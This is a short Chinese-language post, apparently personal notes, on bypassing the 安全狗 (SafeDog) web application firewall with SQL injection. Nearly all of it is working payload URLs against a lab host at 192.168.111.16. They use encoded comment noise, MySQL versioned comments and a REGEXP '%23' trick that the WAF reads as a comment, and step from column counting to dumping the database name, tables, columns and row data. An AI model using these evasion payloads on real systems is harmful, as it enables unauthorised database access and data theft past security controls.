sql注入bypass最新版某狗

某狗最新版本

and绕过

order by 绕过

/*%!*干扰

http://192.168.111.16/index.php?id=1/%2a%%2f/order/%2f%2f/by/%2f%2f/2

union select 绕过

获取当前数据库和用户

数据库同理

http://192.168.111.16/index.php?id=-1/%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,database(/%2f%2f/)

获取数据库表

http://192.168.111.16/index.php?id=1/%2a%%2f/union/%2f%2f//!50441select//%2f%2f/1,group_concat(table_name)%20from%20information_schema.tables%20where%20/wad/table_schema=database(////)

不拦截

http://192.168.111.16/index.php?id=-1%20/%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(table_name),3%20%20%0a%20%20from%20information_schema.tables%20where%20table_schema=database(////)

拦截

http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(table_name),3 ?%0a ?from information_schema.tables where table_schema=database(////)

这里其实REGEXP "[…任意%23]"就行，在url解码%23变成了#，安全狗认为后面全都成为了注释符，带入到mysql层面其实%23只是正则的一个参数并不是注释符

获取表字段

http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(column_name),3 ?%0a ?from information_schema.columns where table_name="newss"

获取数据

http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,content,3 ?%0a ?from newss